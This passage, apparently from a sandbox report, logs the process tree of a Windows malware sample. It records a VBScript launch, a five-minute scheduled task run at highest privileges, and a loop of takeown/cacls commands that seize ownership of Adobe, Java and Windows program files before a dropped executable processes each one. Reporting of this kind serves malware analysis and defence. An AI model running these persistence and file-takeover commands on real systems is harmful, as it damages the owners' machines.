- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kYVxYCrD.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\LmTU0w0y.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:832
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\LmTU0w0y.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:432
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1712
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2004
    - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F64.exe
        
        CnRDNN7F.exe -accepteula "Dynamic.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1964
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:824
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:832
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1544
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:748
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:480
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  - Loads dropped DLL
  PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1084
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1112
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1860
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui""
  2⤵
  - Loads dropped DLL
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1160
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1980
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  - Loads dropped DLL
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Journal.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1372
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Journal.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1112
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  - Loads dropped DLL
  PID:512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:2028
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1640
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:956
